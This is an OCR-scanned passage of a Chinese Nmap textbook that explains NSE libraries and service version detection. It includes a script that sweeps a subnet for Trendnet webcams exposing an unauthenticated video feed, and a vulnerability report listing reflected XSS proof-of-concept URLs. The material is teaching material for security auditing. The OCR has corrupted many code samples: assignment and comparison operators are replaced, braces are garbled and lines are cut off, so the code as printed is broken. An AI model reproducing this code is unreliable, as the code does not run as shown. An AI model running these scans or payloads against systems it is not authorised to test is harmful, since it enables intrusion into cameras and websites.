在 NSE_main.cc 文件 中 按照 如 下 步骤 进行 修改 。 
步骤 1: 在 文件 的 开始 部 分 包含 库 文件 的 头 。 


#include <NSE_test.h> 


步骤 2: 找到 set Nmap libraries(lua_State *L) 函数 ， 然 后 更 新 libs 变量 ， 以 便 包 含 新 库 。 
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static const luaL Reg libs[] = ( 
(NSE PCRELIBNAME, luaopen pcrelib), 
(NSE NMAPLIBNAME, luaopen Nmap], 
(NSE BINLIBNAME, luaopen binlib], 
(BITLIBNAME, luaopen bit), 
(TESTLIBNAME, luaopen test), 
(LFSLIBNAME, luaopen lfs), 
(LPEGLIBNAME, luaopen lpeg), 
#ifdef HAVE OPENSSL 
(OPENSSLLIBNAME, luaopen openssl), 
#endif 

(NULL, NULL) 

N 


步骤 3: 将 变量 NSE SRC, NSE HDRS, NSE OBJS 添加 到 Makefile.in 中 。 


NSE SRC-NSE main.cc NSE utility.cc NSE nsock.cc NSE dnet.cc NSE fs.cc NSE_ 
Nmaplib.cc 

NSE debug.cc NSE pcrelib.cc NSE binlib.cc NSE bit.cc NSE test.cc NSE lpeg.cc 

NSE HDRS-NSE main.h NSE utility.h NSE nsock.h NSE dnet.h NSE fs.h NSE Nmaplib.h 

NSE debug.h NSE pcrelib.h NSE binlib.h NSE bit.h NSE test.h NSE lpeg.h 

NSE OBJS-NSE main.o NSE utility.o NSE nsock.o NSE dnet.o NSE fs.o NSE Nmaplib.o 

NSE debug.o NSE pcrelib.o NSE binlib.o NSE bit.o NSE test.o NSE lpeg.o 


步骤 4 : 在 scripts 文件 夹 中 创建 一 个 名 为 myLibraryTest.NSE 的 文件 ， 添 加 如 图 11-14 
的 内 容 。 





local shortport = require "shortport^ 
description - [[]] 
author = "Administrator" 


license = "Same as Nmap--See http://rmap. org/book/man-legal.html^ 
categories = l'default^] 


portrule = function( host, port ) 
return true 

end 

action = function(host, port) 


local c - test.hello() 








图 11-14 myLibraryTest.NSE 脚本 
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步骤 5: 执行 这 个 脚本 。 

Nmap -p80 --script NSE-test 211.81.200.8 

Starting Nmap 7.3 SVN ( http://Nmap.org ) at 2016-08-13 23:41 CST 
Hello World From a C library 

Nmap scan report for 211.81.200.8 

Host is up (0.12s latency). 

PORT STATE SERVICE 

80/tcp open http 

Nmap done: 1 IP address (1 host up) scanned in 0.49 seconds 


在 这 个 例子 中 ,在 脚本 执行 之 后 ， 屏 幕 上 输出 了 “Hello World From a C library" o 
如 果 想 进一步 学 习 关 于 C 模块 在 NSE 中 的 应 用 ， 可 以 访问 Nmap 和 lua 的 官方 文档 : 


http://www.lua.org/manual/5.2/manual.html#4 
http://Nmap.org/book/NSE-library.html 


11.4 常见 的 NSE 库 文件 


NSE 中 包含 很 多 库 ， 本 节 将 对 一 些 最 常见 的 库 进行 简要 介绍 ， 尤 其 是 对 于 提高 脚本 的 性 
能 十 分 有 效 的 库 。 


11.4.1 shortport 


这 个 库 设计 的 目的 是 帮助 建立 port 的 规则 ， 它 会 收集 最 常见 的 端口 规则 的 信息 。 
可 以 轻松 地 载 人 这 个 库 并 分 配 相 应 的 端口 规则 。 


local shortport = require "shortport" 
portrule - shortport.http 


这 里 面 需要 使 用 到 shortport 库 文件 ， 以 便 快 速 完 成 对 portrule 的 定义 。 


1. 设计 脚本 的 功能 

首先 ， 这 个 脚本 应 该 判断 目标 主机 是 否 提供 daytime 服务 。 
其 次 ， 如 果 目 标 提供 这 种 服务 ， 就 取得 这 个 时 间 。 

最 后 ， 将 这 个 时 间 打 印 出 来 。 


2. 编写 脚本 的 关键 部 分 

按照 脚本 的 设计 思路 来 编写 脚本 的 关键 部 分 。 

首先 编写 execution rule 部 分 。 

由 于 这 个 脚本 是 通过 对 目标 主机 端口 扫描 的 结果 分 析 得 到 的 ， 因 此 这 里 使 用 一 个 名 为 
shortport 的 库 文件 ， 使 用 它 的 好 处 就 是 可 以 快速 返回 结果 ， 无 须 如 同 检测 邮件 木马 中 的 那个 
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例子 一 样 去 编写 判断 语句 。 

shortport 中 提供 了 port or service(ports, services, protos, states) 方法 ， 其 中 4 个 参数 分 别 
介绍 如 下 。 

口 ports: 一 个 或 者 多 个 端口 号 。 

O services: 一 个 或 者 多 个 服务 的 名 称 。 

O protos: 一 个 或 者 多 个 匹配 的 协议 ， 默 认 值 为 “tcp”。 

Q states: 一 个 或 者 多 个 匹配 的 状态 , 默认 值 为 {"open", "open|filtered") 。 

这 个 方法 在 接 到 端口 扫描 结果 之 后 ， 如 果 检 测 到 参数 中 提供 的 ports 、services， 返 回 值 
就 为 tue， 这 样 做 的 原因 是 ， 常 见 的 服务 一 般 都 应 运行 在 指定 端口 上 ， 但 有 时 候 目标 的 管理 
员 可 能 会 将 一 些 服务 转移 到 其 他 端口 上 ， 因 此 只 扫描 端口 的 话 ， 可 能 会 出 现 遗 漏 。 

例如 ， 扫 描 目 标 上 是 否 存 在 SSH 服务 ， 就 可 以 使 用 如 下 命令 。 

portrule = shortport.port or service(22,"ssh"). 

在 本 例 中 ,扫描 的 目标 是 13 端口 ， 或 者 “daytime” 服 务 ， 使 用 的 命令 如 下 。 

portrule = shortport.port or service(13, "daytime", ("tcp", "udp")) 

这 里 省 略 了 最 后 一 个 参数 ， 因 此 states 使 用 了 默认 值 。 

由 于 这 个 方法 有 返回 值 ， 因 此 无 须 再 编写 return 语句 。 

其 次 编写 action 部 分 。 

需要 与 目标 主机 的 端口 建立 通信 ， 并 取得 目标 的 时 间 。 这 里 需要 使 用 到 另 一 个 库 文件 
comm。 这 个 库 的 功能 是 进行 数据 交换 ， 可 以 使 用 comm 这 个 库 中 的 exchange 方法 来 实现 
数据 的 传送 : 它 会 和 目标 主机 的 目标 端口 建立 连接 ， 发 送 数 据 ， 如 果 有 回应 ， 就 接收 这 些 
数据 。 

exchange (host, port, data, opts) 中 包含 4 个 参数 ， 分 别 介绍 如 下 。 

口 host: 连接 的 目标 主机 。 

口 port: 目标 主机 的 指定 端口 。 

Q data: 开始 要 发 送 的 数据 。 

O opts: 指定 了 传递 中 的 一 些 细节 ， 不 过 是 个 可 选项 。 

opts 常见 的 值 有 如 下 两 个 。 

O bytes: 读 取 的 最 小 字 节 数 。 

Q lines: 读 取 的 最 小 行 数 。 

这 个 函数 的 返回 值 有 两 个 。 

口 status (true 或 者 false)。 

口 数据 (如 果 status 的 值 为 true) 或 者 error 字符 串 (如果 status 的 值 为 false)。 























最 后 返回 result 的 值 就 可 以 了 。 
return result 


图 11-15 给 出 了 shortport 的 完整 使 用 代码 。 











m 








local comm = require "comm" 
local shortport - require "shortport^ 


1 

2 

3 

4 

S description - [[ 
6 Retrieves the day and time from the Daytime service. 
8 

9 


11 
10 一 Goutput 
11 [一 PORT STATE SERVICE 
12 | 一 13/tcp open daytime 
13 一 | daytime: Wed Mar 31 14:48:58 MDI 2010 
14 


15 author = "Diman Todorov” 


17 license = "Same as Nmap--See https://nmap. org/book/man-legal.html^ 


19 categories = ('discovery/, “safe”} 


22 portrule = shortport.port or service(13, "daytime , ('tcp', "udp']) 


24 action - function(host, port) 
25 local status, result = comm. exchange (host, port, “dummy”, {lines=1}) 


7 if status then 


28 return result 
28 end 
30 end 








图 11-15 shortport 使 用 范例 代码 
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这 里 使 用 comm.exchange 方法 向 目标 计算 机 发 送 一 个 “dummy ”字符 串 ， 命 令 如 下 。 
local status, result = comm.exchange (host, port, "dummy", {lines=1}) 
如 果 目 标 计算 机 提供 daytime 服务 ， 就 会 返回 系统 的 时 间 ，Nmap 在 接收 之 后 会 将 
存在 result 中 。 
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114.2 http 


现在 Nmap 已 经 成 为 一 个 强大 有 力 的 Web 漏洞 扫描 工具 ， 通 过 http 库 完 成 所 有 对 HTTP 
相关 的 安全 检测 操作 。 这 个 库 简单 易 用 ， 而 且 人 允许 对 raw header 进行 操作 ， 也 支持 HTTP 的 
pipelining 操作 。 

这 个 库 中 包含 http.head()、http.get() 和 http.post() 等 函数 。 这 些 函 数 对 应 HTTP 中 的 
head 、get 和 post 方 法 。 

可 以 使 用 如 下 方法 调用 来 实现 一 个 HTTP 中 的 get 方法 。 

local respo = http.get(host, port, uri) 

现在 利用 http 库 文件 来 开发 一 个 简单 但 很 容易 使 用 的 视频 监控 漏洞 的 检测 脚本 。 

视频 监控 是 现在 最 为 流行 的 一 种 安全 保障 措施 。 很 多 单位 和 家 庭 都 安装 了 摄像 头 ， 然 
后 通过 互联 网 来 远程 监控 这 些 地 点 所 发 生 的 一 切 。 遗 憾 的 是 ， 很 多 视频 监控 的 设计 本 身 并 
不 够 完善 ， 这 就 导致 了 一 些 别 有 用 心 的 人 也 可 以 使 用 非法 的 手段 通过 这 些 摄像 头 来 浏览 这 
些 地 点 。 

这 里 以 Trendnet 的 一 款 TV-IP110W 产品 为 例 。 这 款 产 品 在 使 用 时 ， 只 需要 输入 监控 设 
备 的 IP 地 址 + /anony/mjpg.cgi。 无 须 任 何 认 证 即 可 完成 访问 ， 事 实 上 ， 到 现在 为 止 ， 仍 然 有 
很 多 产品 仍然 采用 这 种 方式 。 

接 下 来 编写 一 个 NSE 脚本 以 便 检 测 这 些 设备 。 


1. 脚本 设计 思路 

本 例 中 ， 这 个 脚本 将 实现 如 下 功能 。 

首先 ， 对 网 络 进行 扫描 。 

其 次 ， 根 据 扫 描 的 结果 ， 查 看 是 否 有 可 以 无 须 认 证 就 可 以 访问 的 anony/mjpg.cgi。 
最 后 ， 如 果 找 到 了 这 种 页 面 就 将 其 输出 。 

2. 实现 设计 的 脚本 

下 面具 体 实 现 这 个 脚本 设计 。 

这 里 面 因为 要 访问 目标 的 Web 服务 ， 所 以 需要 使 用 和 http 相关 的 库 。 











local http = require "http" 
local shortport - require "shortport" 
local stdNSE - require "stdNSE" 


首先 定义 execution rule 部 分 。 
这 一 次 仍然 使 用 shortport， 但 是 使 用 shortport 中 专门 用 来 处 理 http 的 新 方法 ， 这 个 方法 
的 名 字 刚 好 也 是 http。 


http (host, port) 
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http 方法 使 用 如 下 两 个 参数 。 

Q host; 目标 主机 。 

口 port: 目标 端口 。 

http 方法 返回 一 个 布尔 型 的 值 ， 如 果 目 标 端口 上 运行 着 HTTP IRZ, BENEN true, 











则 为 false。 创 建 一 个 portrule， 命 令 如 下 。 


OK” 


portrule = shortport.http 
其 次 编写 脚本 的 action 部 分 。 这 也 是 脚本 中 最 为 重要 的 一 部 分 。 
action = function(host, port) 
定义 要 查找 的 页 面 ， 命 令 如 下 。 
local uri = "/anony/mjpg.cgi" 


然后 判断 页 面 的 访问 情况 ， 如 果 目 标 页 面 可 以 正常 访问 的 话 ， 服 务 器 会 给 出 一 个 “200: 


”的 值 ;， 如果 目标 页 面 无 法 正常 访问 的 话 ， 通 常服 务 器 会 给 出 一 个 “404: file not found" 


的 错误 ， 这 里 就 可 以 利用 这 个 原理 来 实现 对 目标 页 面 是 否 可 以 访问 进行 判断 。 


这 里 面 使 用 了 http 库 中 的 一 个 head 方法 。 这 个 方法 会 向 目标 地 址 发 送 一 个 请 求 ， 然 后 


返回 目标 发 回 的 数据 包 的 一 些 信息 。 这 个 方法 使 用 如 下 4 个 参数 。 


口 host: 目标 主机 。 

O port: 目标 端口 。 

O path: 试图 访问 的 页 面 地 址 。 

O options: [可 选项 ]， 一 个 表 。 
编写 如 下 命令 。 

local resp - http.head(host, port, uri) 


执行 后 返回 值 为 一 个 表 ， 这 个 表 中 包含 了 很 多 信息 ， 例 如 数据 包 的 status, header, 


cookies 等 ， 其 中 status 给 出 HTTP 的 状态 值 ， 如 果 页 面 访问 正常 的 话 ， 这 个 值 就 为 200 ; 如 
果 在 访问 过 程 中 出 现 了 问题 ， 这 个 值 就 是 nil。 











此 判断 是 否 正常 ， 就 可 以 使 用 如 下 语句 。 
if resp.status and resp.status -- 200 
如 果 这 个 值 为 真 ， 返 回 这 个 页 面 。 


return string.format("Trendnet TV-IP110W video feed is unprotected:http: 
//*s/anony/mjpg.cgi", host.ip) 


这 段 程序 的 完整 代码 如 图 11-16 所 示 。 
利用 这 个 脚本 对 192.168.153.0/24 这 个 地 址 范围 进行 检测 ， 查 看 是 否 存 在 包含 这 个 漏洞 








的 计算 机 ， 检 测 的 结果 如 图 11-17 所 示 。 
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1 description = [[ 

2 Attempts to detect webcams Trendnet TV-IP110W vulnerable 

3 to unauthenticated access to the video stream by querying 

4 the URI "/anony/mjpg. cgi”. 

S Original advisory: http://consolecowboys. blogspot. con/2012/01/trendnet-cameras-i-alwaysfeel-like, htnl 
e 1 

7 categories = ("exploit^,^vuln'] 

8 local http = require "http" 

9 local shortport = require ^shortport^ 

10 local stdnse = require “stdnse” 

nu portrule = shortport.http 

12 action - function(host, port) 

13 local uri = "/anony/mjpg.cgi^ 

14 local , status 404, resp 404 = http.identify 404 (host, port) 

15 if status_404 == 200 then 

16 stdnse. print_debug (1, 

17 "Ks: Web server returns ambiguous response. Irendnet webcams return standard 404 status responses. Exiting.” 
18 ， SCRIPT_NAME) 

19 return 

20 end 

21 stdnse. print_debug (1, 

22 "Ks: HITP HEAD Xs", SCRIPT_NAME, uri) 

23 local resp - http.head(host, port, uri) 

24 if resp.status and resp. status == 200 then 

25 return string.format( 

26 “Trendnet IV-IP110W video feed is unprotected:http://Ks/anony/njpg. cgi” 
27 » host. ip) 

28 end 

29 end 











11-16 http 库 使 用 范例 代码 





扫描 (a) 工具 中 KES EBD) 
目标 : |1921681153.0/24 











d: nmap -p 80 script http-trendnet-tiip110w 192.168.153.0/24| 

















[Es] m] | nmns [aucem | eon | emen | n 
所 作 系统 4 : 。 |nmap -p 80 script http-trendnet-tvip110w 192.168.153.0/24 i-] 





v a 
Starting Nmap 7.30 ( https://nmap.org ) at 2016-11-04 17:17 2D10+Ex?E+33 
Nmap scan report for bogon (192.168.153.130) 

Host is up (0.00s latency). 

PORT STATE SERVICE 







" 


video feed is 3 











Nmap scan report for bogon (192.168.153.254) 
Host is up (0.80s latency). 

PORT STATE SERVICE 

80/tcp filtered http 

T |MAC Address: 00:50:56:FB:4C:D2 (VMware) 


Nmap scan report for bogon (192.168.153.1) 


Ee Wer Pe ue (0 aae Tetencel S 




















图 11-17. {E http-trendnet-tvipl Ow 后 的 检测 结果 


176 Ð 诸 神 之 上 腿 一 -Nmap 网 络 安全 审计 技术 揭秘 


从 扫描 结果 上 可 以 看 出 ， 当 前 网 络 中 192.168.153.130 主机 上 存在 这 样 的 漏洞 。 事 实 上 
现在 很 多 监控 系统 都 采用 这 样 的 方式 ， 只 需要 稍微 改动 一 下 这 个 脚本 ， 就 可 以 对 其 他 类 型 的 
监控 系统 进行 检测 。 


11.4.3 stdNSE 


stdNSE 库 中 包含 了 NSE 开发 中 各 种 有 用 的 功能 ， 涉 及 与 定时 、 并 发 、 输 出 和 字符 串 处 
理 相关 的 函数 。 

1. stdNSE.get_script_args 函数 

当 在 Nmap 执行 过 程 中 ， 利 用 stdNSE.get_script_args 函数 就 通过 选项 --script-args 来 传 
递 参 数 。 


local threads = stdNSE.get script args(SCRIPT NAME..".threads") or 3 


2. stdNSE.debug 函数 
StdNSE.debug 函数 用 来 输出 一 个 调试 信息 。 


StdNSE.debug2("This is a debug message shown for debugging level 2 or higher") 


3. stdNSE.verbose 函数 
StdNSE.verbose 函数 格式 化 输出 一 个 详细 信息 。 


StdNSE.verbosel("not running for lack of privileges.") 


4. stdNSE.strjoin 函数 
stdNSE.strjoin 函数 根据 定 界 符 将 字符 串 连接 起 来 。 


local output = stdNSE.strjoin("\n", output_ lines) 


5. stdNSE.strsplit 函数 
stdNSE.strsplit 函数 使 用 分 隔 符 来 分 割 一 个 字符 串 。 
local headers = stdNSE.strsplit("\r\n", headers) 


关于 stdNSE 库 的 详细 内 容 可 以 查看 https://Nmap.org/NSEdoc/lib/stdNSE.html 





11.4.4 OpenSSL 


这 是 一 个 用 来 绑 定 到 OpenSSL 的 接口 ， 主 要 用 来 进行 加 密 ， 它 是 否 可 用 取决 于 Nmap 
的 建立 方式 ,但 是 可 以 通过 pcall0 的 帮助 来 查看 这 个 类 是 否 可 以 使 用 。 


if not pcall (require, "openssl") then 
action = function(host, port) 
StdNSE.print debug(2, "Skipping \"%s\" because OpenSSL is missing.", id) 


第 11 章 NSE 中 的 库 文件 & 177 





end 
end 
action = action or function(host, port 


end 


11.4.5 target 


这 是 一 个 相当 实用 的 库 ， 这 个 库 的 主要 目的 是 管理 新 发 现 目 标的 扫描 队列 。NSE 根据 
prerule, hostrule, portrule 规则 来 向 当前 的 扫描 队列 中 添加 新 的 目标 。 如 果 现 在 编写 一 个 
discovery 类 的 脚本 ， 这 个 库 是 相当 有 用 的 。 

在 向 队列 中 添加 目标 时 ， 可 以 使 用 target.add 函数 。 


local status, err = target.add("192.168.1.1","192.168.1.2",...) 


11.4.6 creds 


这 个 库 用 来 保存 脚本 在 执行 时 发 现 的 登录 赁 证。 这些 赁 证 都 被 保存 在 注册 表 中 ， 同 样 它 
也 提供 了 一 个 和 数据 库 协 同 合作 的 接口 。 

如 果 想 将 这 个 登录 凭证 添加 到 数据 库 中 ， 只 需要 创建 一 个 creds 对 象 ， 用 于 调用 add 
函数 。 


local c = creds.Credentials:new( SCRIPT NAME, host, port ) 
C:add("packtpub", "secret", creds.State.VALID ) 


11.4.7 vluns 


这 个 库 主要 用 来 提供 关于 主机 的 安全 漏洞 方面 的 信息 。 它 可 以 对 NSE 所 发 现 的 目标 系 
统 的 漏洞 进行 管理 并 生成 易于 阅读 的 报告 。 下 面 的 例子 给 出 了 一 个 报告 的 范例 。 


PORT STATE SERVICE REASON 
80/tcp open http syn-ack 
http-phpself-xss: 

VULNERABLE: 


Unsafe use of $ SERVER["PHP SELF"] in PHP files 

State: VULNERABLE (Exploitable) 

Description: 

PHP files are not handling safely the variable $ SERVER["PHP SELF"] causing Reflected 
Cross Site Scripting vulnerabilities. 

Extra information: 

Vulnerable files with proof of concept: 

http: //calder0n.com/sillyapp/three.php/$272$22/$3E$3Cscript$3Ealert (1) $3C/script$3E 
http: //calder0n.com/sillyapp/secret/2.php/2$27$22/$3E$3Cscript$3Ealert (1) $3C/script*3E 
http: //calder0n.com/sillyapp/1l.php/$27$22/2$3E$3Cscript$3Ealert (1) $3C/script$3E 

http: //calder0n.com/sillyapp/secret/1.php/$27$22/$3E$3Cscript$&3Ealert (1) $3C/script$3E 
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Spidering limited to: maxdepth-3; maxpagecount-20; withinhost=calder0n.com 
References: 

https://www.owasp.org/index.php/Cross-site Scripting (XSS) 
http://php.net/manual/en/reserved.variables.server.php 


小 结 


在 这 一 章 中 ， 学 习 了 NSE 中 库 文件 的 编写 ， 在 编写 过 程 中 分 别 以 C 和 Lua 语言 对 库 文 
件 进行 了 编写 ， 并 介绍 了 NSE 中 使 用 最 普遍 的 几 种 库 ， 对 其 中 尤为 重要 的 两 个 库 文件 进行 了 
实例 编写 。 在 下 一 章 中 将 利用 这 些 功能 来 加 强 服务 检测 的 功能 。 


CHAPTER 


112 
对 服务 发 现 功能 进行 增强 


NSE 允许 对 已 有 的 功能 进行 改造 。 例 如 可 以 利用 执行 针对 扫描 目标 的 额外 指纹 任务 来 提 
高 本 来 就 已 经 很 强大 的 服务 发 现 功能 。 当 服务 发 现 模式 启动 以 后 ， 属 于 服务 发 现 类 别 的 所 有 
脚本 就 会 执行 。 因此， 必须 明确 知道 一 个 脚本 是 否 属于 这 个 类 别 。 另 外 ， 如 果 在 检测 不 同 服 
务 时 不 能 触发 误 报 。 

在 本 章 中 ， 将 会 介绍 NSE 版 本 检测 的 基本 原理 以 及 如 何 编写 自 定义 的 NSE 脚本 。 先 回 
顾 一 下 版 本 检测 脚本 中 最 常见 的 主机 和 端口 执行 规则 。 有 时 候 ， 会 遇 到 一 些 无 法 识别 的 服 
务 ， 这 正 是 一 个 检验 学 习 成 果 的 好 机 会 ， 也 可 以 在 Nmap 社区 中 分 享 自己 所 编写 的 新 的 版 本 
检测 脚本 。 








12.1 NSE 中 的 服务 发 现 模式 


在 Nmap 中 使 用 -sV 可 以 启动 服务 发 现 模式 ， 这 样 就 可 以 获得 目标 系统 上 正在 运行 的 服 
务 版 本 信息 。 如 果 在 Nmap 的 执行 过 程 中 使 用 了 -sV 选项 ， 那 么 扫描 结果 中 就 会 多 一 个 额外 


的 version 列 。 





PORT STATE SERVICE VERSION 


22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 
2.0) 

25/tcp filtered smtp 

80/tcp open http Apache httpd 2.2.14 ((Ubuntu)) 


9929/tcp open nping-echo Nping echo 


e 
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Service Info: OS: Linux; CPE: cpe:/o:linux:linux kernel 

Service detection performed. Please report any incorrect results at http:// 
Nmap.org/submit/. 

Nmap done: 1 IP address (1 host up) scanned in 16.63 seconds 


这 里 返回 的 信息 根据 目标 的 不 同 而 不 同 ， 但 是 对 于 渗透 者 来 说 ， 利 用 这 些 信息 可 以 帮助 
找到 目标 系统 的 漏洞 。 同 时 对 于 一 个 网 络 管理 员 来 说 ， 利 用 这 些 信息 可 以 发 现 网 络 上 不 易 察 
觉 的 变化 。 这 些 信息 中 会 列 出 关于 目标 系统 非常 详细 的 协议 和 服务 信息 。 

使 用 如 下 的 语句 就 可 以 启动 对 目标 的 服务 发 现 模式 。 


Nmap -sV www.tstc.edu.cn 


12.1.1 ”服务 发 现 的 过 程 


一 个 完整 的 服务 发 现 过程 包 括 如 下 步骤 。 

步骤 1: 如 果 目 标 端口 的 状态 是 opened， 就 会 发 送 一 个 NULL 类 型 的 探 针 到 这 个 端 
口 ， 这 种 类 型 的 探 针 包括 一 个 用 于 打开 连接 的 请 求 ， 然 后 Nmap 会 等 待 从 目标 端口 返回 的 回 
应 。 在 收 到 回应 之 后 ，Nmap 会 将 这 个 回应 和 数据 库 中 的 各 种 指纹 数据 进行 比较 ， 产 生 一 个 
softmatch 或 者 hardmatch， 如 果 匹 配 结果 是 softmatch, Nmap 会 再 发 送 额外 的 探 针 。 

步骤 2: 如 果 这 个 NULL 探 针 没 能 成 功 检 测 出 目标 的 服务 信息 ， 保 存在 Nmap-service- 
probes 文件 中 的 TCP 和 UDP 类 型 探 针 就 会 发 送 到 目标 。 这 个 过 程 与 NULL 指针 的 探测 过 
程 十 分 相似 ， 稍 有 不 同 的 就 是 这 两 种 类 型 的 探 针 都 不 是 空 的 ， 其 中 包含 了 一 段 字符 串 作为 
载荷 。 正 如 之 前 所 说 的 ， 这 些 探 针 产生 的 回应 也 要 和 数据 库 中 的 已 知 指纹 数据 进行 比较 。 

步骤 3 : 如 果 这 两 个 阶段 都 没有 得 到 结果 ，Nmap 就 会 发 送 特殊 类 型 的 探 针 ， 这 个 阶段 
经 过 优化 ， 尽 量 减少 发 送 的 探 针 的 数量 ， 以 避免 对 网 络 造成 过 大 的 负载 。 

步骤 4 : 发 送 的 探 针 会 检测 目标 上 是 否 运行 SSL 服务 。 如 果 检 测 到 这 个 服务 ， 服 务 扫 描 
将 会 重启 ， 来 检测 这 个 服务 。 

步骤 5: 发 送 一 系列 的 探 针 来 检测 目标 是 否 开放 了 基于 RPC 的 服务 。 

步骤 6 : 如 果 探 针 产 生 的 回应 是 无 法 识别 的 ，Nmap 将 根据 这 个 回应 产生 一 个 指纹 文件 ， 
然后 提交 到 Nmap 的 开发 中 心 ， 以 提高 数据 库 识别 服务 的 能 力 。 

















12.1.2 ”调整 版 本 扫描 的 级 别 

发 送 到 每 个 服务 的 探 针 的 数量 取决 于 它们 在 Nmapservice-probes 文件 中 的 定义 ， 也 可 以 
使 用 参数 --version-intensity [0-9] 来 改变 扫描 的 强度 ， 也 就 是 改变 探 针 的 数量 。 

Nmap -sV --version-intensity 9 «target» 

这 个 扫描 的 强度 越 大 ， 效 果 越 好 ， 但 是 花费 的 时 间 也 就 越 多 。 默 认 的 扫描 强度 是 7。 另 
外 也 可 以 使 用 文本 的 形式 ， 例 如 --version-light 和 --version-all。--version-light 对 应 的 扫描 强 
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度 就 是 2，--version-all 的 扫描 强度 就 是 9。 


12.1.3 ”更 新 版 本 侦 测 探 针 数据 库 


进行 版 本 侦 测 时 所 使 用 的 探 针 数据 库存 储 在 Nmap-service-probes 文件 中 ， 这 个 数据 库 
文件 一 直 在 持续 更 新 。 同 样 ， 也 可 以 将 最 新 的 服务 指纹 文件 提交 给 Nmap。 

Nmap-service-probes 文件 中 包含 了 若干 个 决定 扫描 行为 的 命令 。 可 以 通过 修改 这 个 文件 
来 实现 ， 例 如 将 某 个 端口 排除 在 扫描 范围 之 外 ， 改 变 NULL 指针 的 timeout 值 。 下 面 给 出 的 
是 这 个 数据 库 的 一 部 分 内 容 。 


# The Exclude directive takes a comma separated list of ports. 

# The format is exactly the same as the -p switch. 

Exclude T:9100-9107 

# This is the NULL probe that just compares any banners given to us 
JHÓHHEEEEIHGRHRRREEIHIHHRREEEHEIHHHENEXT PROBE E REEERE REEERE E EEEE EE 
Probe TCP NULL q|| 

# Wait for at least 5 seconds for data. Otherwise an Nmap default is used. 
totalwaitms 5000 

# Windows 2003 

match ftp m/^220[ -]Microsoft FTP Service\r\n/ p/Microsoft ftpd/ 

match ftp m/^220 ProFTPD (\d\S+) Server/ p/ProFTPD/ v/$1/ 

softmatch ftp m/^220 [-.\w ]+ftp.*\r\n$/i 

match ident m|^flock\(\) on closed filehandle .*midentd| p/midentd/ i/broken/ 
match imap m|^\* OK Welcome to Binc IMAP v(Md[-.Nw]*)| p/Binc IMAPd/ v$1/ 
softmatch imap m/^\* OK [-.Nw ]*imap[-.Nw ]+\r\n$/i 

match lucent-fwadm m|^0001;2$| p/Lucent Secure Management Server/ 

match meetingmaker m/^Wxc1,$/ p/Meeting Maker calendaring/ 

# lopster 1.2.0.1 on Linux 1.1 

match napster m|^1$| p/Lopster Napster P2P client/ 

Probe UDP Help qlhelp\r\n\r\n| 

rarity 3 

ports 7,13,37 

match chargen m|GABCDEFGHIJKLMNOPQRSTUVWXYZ | 

match echo m|^help\r\n\r\n$| 








12.1.4 ”从 版 本 检测 中 排除 指定 端口 

Nmap 在 默认 的 情况 下 并 不 会 向 从 9100 到 9107 这 部 分 TCP 端口 发 送 版 本 检测 的 探 针 。 
这 是 因为 这 些 端口 上 通常 运行 的 都 是 一 些 打 印 机 的 服务 ， 当 这 些 端口 收 到 探 针 之 后 ， 就 会 
返回 大 量 的 垃圾 文件 。 如 果 想 将 其 他 的 服务 端口 添加 进来 ， 可 以 使 用 Exclude 命令 添加 到 


Nmap-service-probes 中 。 





注意 : 当 使 用 --allports 选项 进行 扫描 时 ， 实 际 上 并 不 是 真 的 对 所 有 的 端口 进行 扫描 ， 


已 经 使 用 exclude 排除 的 端口 并 不 在 扫描 的 范围 内 。 
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12.1.5 post-processors 简介 
post-processors 是 设计 用 来 完成 在 对 指定 服务 检测 之 后 的 特定 服务 的 。 这 里 有 两 个 post- 


processors; 


1. NSE 
NSE 用 来 执行 高 级 指纹 检测 服务 ， 以 克服 正则 表达 式 检 测 系统 的 限制 。 它 负责 将 主机 和 
端口 数据 传递 给 相应 的 NSE 版 本 脚本 。 


2. SSL 

SSL 用 来 识别 运行 在 SSL 上 的 协议 ， 它 会 建立 一 个 加 密 的 会 话 。 这 样 Nmap 就 可 以 实现 
XI SMTP, HTTP, FTP 以 及 一 些 运行 在 SSL 上 的 其 他 协议 进行 检测 。 这 个 post-processors W 
赖 系 统 中 的 OpenSSL。 

















12.2 ” 自 定义 版 本 检测 脚本 


在 编写 的 过 程 中 ， 需 要 使 用 Nmap 提供 的 API 来 完成 和 主机 及 端口 数据 库 的 数据 交换 。 
为 了 完成 版 本 检测 脚本 的 编写 ， 需 要 完成 如 下 步骤 。 

步骤 1: 将 脚本 的 分 类 选择 为 versions 

步骤 2: 编写 对 应 的 portrule。 

步骤 3: 检测 成 功 以 后 给 出 端口 版 本 。 


12.2.1 将 脚本 的 分 类 定义 为 version 检测 
这 里 的 第 一 个 步骤 是 十 分 简单 的 ， 在 脚本 中 为 其 定义 分 类 的 方法 如 下 。 


category = ("version") 
category 的 类 型 是 一 个 普通 的 Lua 表 ， 因 此 ， 如 果 需 要 将 脚本 定义 为 多 个 类 别 ， 这 也 是 
很 容易 实现 的 。 





12.2.2 ”定义 版 本 检测 脚本 的 portrule 


接 下 来 需要 为 目标 服务 定义 一 个 portrule。 
下 面 这 些 函 数 名 将 有 助 于 定义 这 些 portrule。 


shortport.portnumber(port, protos, states) 
Shortport.version port or service(ports, services, protos, states) 
Shortport.port or service(ports, services, protos, states) 
shortport.service(services, protos, states) 
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这 些 函 数 名 保存 在 shortport 库 中 ， 如 果 想 在 脚本 中 包含 这 个 库 文件 ， 可 以 调用 require 


引入 这 个 库 。 


local "shortport" = require "shortport" 


例如 ， 如 果 希 望 的 条 件 是 在 522 端口 上 运行 的 任意 状态 为 open 或 者 filtered 的 TCP 服务 


或 者 UDP 服务 ， 我 们 可 以 使 用 shortport 中 的 函数 version_port_or_service()。 


portrule = shortport.version port or service((52), nil, ("tcp","udp"), 
("open", "open |filtered"]) 


12.2.3 ”更 新 端口 服务 版 本 信息 


执行 完 任务 之 后 可 以 得 到 详细 准确 的 服务 信息 。 可 能 需要 返回 这 些 信 息 ， 并 更 新 目标 端 


口 的 状态 和 版 本 的 信息 。 为 了 更 新 这 些 信 息 ， 需 要 使 用 Nmap 的 API 函数 。 


Nmap.set port version(host, port, confidence) 

首先 ， 引 入 必需 的 Nmap 库 。 

local Nmap - require "Nmap" 

其 次 ,使 用 函数 set port version() 来 更 新 version 列 的 如 下 选项 。 
O name 

O product 

O version 

O extrainfo 

O hostname 

ü ostype 

Q devicetype 

O service tunnel 

Q cpe 

最 后 ， 设 置 对 应 的 匹配 级 别 ，confidence 字段 给 出 了 NSE 脚本 检测 出 的 信息 的 可 信 度 ， 


可 能 的 值 如 下 。 


O hardmatched 
O softmatched 
O nomatch 

